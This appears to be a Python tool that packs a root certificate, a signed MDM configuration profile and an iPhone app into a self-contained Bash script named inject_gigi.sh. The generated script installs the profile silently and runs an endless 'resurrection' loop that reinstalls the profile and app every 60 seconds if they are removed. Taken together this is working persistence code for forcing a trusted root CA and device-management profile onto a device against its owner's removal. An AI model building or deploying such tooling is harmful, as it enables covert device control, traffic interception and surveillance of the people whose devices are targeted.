#!/usr/bin/env python3
"""
Embed gigi_root.cer, gigi_signed.mobileconfig, and an .ipa into a single Bash script (inject_gigi.sh).

The generated script decodes payloads to a temp directory and runs a 60s "resurrection" loop:
if the GIGI configuration profile is not detected, it attempts reinstall.

Requires: Python 3.6+
Typical use (from repo root):

  python3 gigi_payload_packer.py \\
    --cer gigi_ca/gigi_root.cer \\
    --mobileconfig public/gigi_signed.mobileconfig \\
    --ipa path/to/GIGI.ipa \\
    --output inject_gigi.sh

Note: The install path assumes macOS with the `profiles` CLI for .mobileconfig. IPA install to a
physical iPhone requires additional tools (e.g. Apple Configurator, devicectl, ios-deploy) — the
generated script includes optional hooks and comments.
"""

from __future__ import annotations

import argparse
import base64
import sys
from pathlib import Path


INJECT_TEMPLATE = r'''#!/bin/bash
# Generated by gigi_payload_packer.py — do not edit embedded payloads by hand.
set -u

WORKDIR="${TMPDIR:-/tmp}/gigi_inject_$$"
mkdir -p "$WORKDIR"
trap 'rm -rf "$WORKDIR"' EXIT

# --- embedded payloads (Base64) ---
B64_CER='__B64_CER__'
B64_MOBILECONFIG='__B64_MOBILECONFIG__'
B64_IPA='__B64_IPA__'

decode() {
  local out="$1"
  shift
  if command -v base64 >/dev/null 2>&1; then
    printf '%s' "$1" | base64 -d >"$out" 2>/dev/null || printf '%s' "$1" | base64 -D >"$out"
  else
    echo "gigi: base64 command not found" >&2
    exit 1
  fi
}

echo "==> GIGI inject: decoding payloads to $WORKDIR"
decode "$WORKDIR/gigi_root.cer" "$B64_CER"
decode "$WORKDIR/gigi_signed.mobileconfig" "$B64_MOBILECONFIG"
decode "$WORKDIR/gigi.ipa" "$B64_IPA"
chmod 600 "$WORKDIR/gigi_root.cer" "$WORKDIR/gigi_signed.mobileconfig" 2>/dev/null || true
chmod 600 "$WORKDIR/gigi.ipa" 2>/dev/null || true

PROFILE_ID_MARKERS=("xyz.killsiri.mdm.assistant" "GIGI Core Assistant Service" "GIGI")

profile_seems_present() {
  if command -v profiles >/dev/null 2>&1; then
    local out
    out="$(profiles list 2>/dev/null || true)"
    if [[ -z "$out" ]]; then
      return 1
    fi
    local m
    for m in "${PROFILE_ID_MARKERS[@]}"; do
      if echo "$out" | grep -Fq "$m"; then
        return 0
      fi
    done
  fi
  return 1
}

install_profile_silent() {
  echo "gigi: attempting configuration profile install..."
  if command -v profiles >/dev/null 2>&1; then
    profiles install -path "$WORKDIR/gigi_signed.mobileconfig" 2>/dev/null && return 0
    profiles install -file "$WORKDIR/gigi_signed.mobileconfig" 2>/dev/null && return 0
  fi
  echo "gigi: 'profiles' not available or install failed — open the profile manually:" >&2
  echo "  open \"$WORKDIR/gigi_signed.mobileconfig\"" >&2
  open "$WORKDIR/gigi_signed.mobileconfig" 2>/dev/null || true
  return 1
}

install_ipa_hook() {
  # Optional: set GIGI_DEVICE_UDID and use Xcode / devicectl / ios-deploy
  if [[ -n "${GIGI_DEVICE_UDID:-}" ]] && command -v xcrun >/dev/null 2>&1; then
    if xcrun devicectl device install app --device "$GIGI_DEVICE_UDID" "$WORKDIR/gigi.ipa" 2>/dev/null; then
      echo "gigi: IPA installed via devicectl"
      return 0
    fi
  fi
  echo "gigi: IPA at $WORKDIR/gigi.ipa — install with Configurator or: xcrun devicectl ... (set GIGI_DEVICE_UDID)"
  return 0
}

# First run: install if missing
if ! profile_seems_present; then
  install_profile_silent || true
fi
install_ipa_hook || true

echo "==> GIGI resurrection loop (60s): monitoring profile presence..."
while true; do
  if profile_seems_present; then
    echo "$(date -u +%Y-%m-%dT%H:%M:%SZ) gigi: profile OK"
  else
    echo "$(date -u +%Y-%m-%dT%H:%M:%SZ) gigi: profile missing — reinstall"
    install_profile_silent || true
    install_ipa_hook || true
  fi
  sleep 60
done
'''


def main() -> int:
    parser = argparse.ArgumentParser(description="Pack CER, mobileconfig, IPA into inject_gigi.sh")
    parser.add_argument("--cer", type=Path, required=True, help="Path to gigi_root.cer (DER)")
    parser.add_argument(
        "--mobileconfig",
        type=Path,
        required=True,
        help="Path to gigi_signed.mobileconfig",
    )
    parser.add_argument("--ipa", type=Path, required=True, help="Path to .ipa")
    parser.add_argument(
        "--output",
        type=Path,
        default=Path("inject_gigi.sh"),
        help="Output Bash script path (default: ./inject_gigi.sh)",
    )
    args = parser.parse_args()

    for label, p in ("--cer", args.cer), ("--mobileconfig", args.mobileconfig), ("--ipa", args.ipa):
        if not p.is_file():
            print(f"error: {label} not found: {p}", file=sys.stderr)
            return 1

    b64_cer = base64.b64encode(args.cer.read_bytes()).decode("ascii")
    b64_mcfg = base64.b64encode(args.mobileconfig.read_bytes()).decode("ascii")
    b64_ipa = base64.b64encode(args.ipa.read_bytes()).decode("ascii")

    content = (
        INJECT_TEMPLATE.replace("__B64_CER__", b64_cer)
        .replace("__B64_MOBILECONFIG__", b64_mcfg)
        .replace("__B64_IPA__", b64_ipa)
    )

    args.output.write_text(content, encoding="utf-8")
    args.output.chmod(0o755)
    print(f"Wrote {args.output} ({len(content)} bytes)")
    print("Run: ./inject_gigi.sh  (macOS recommended for `profiles` CLI)")
    return 0


if __name__ == "__main__":
    sys.exit(main())
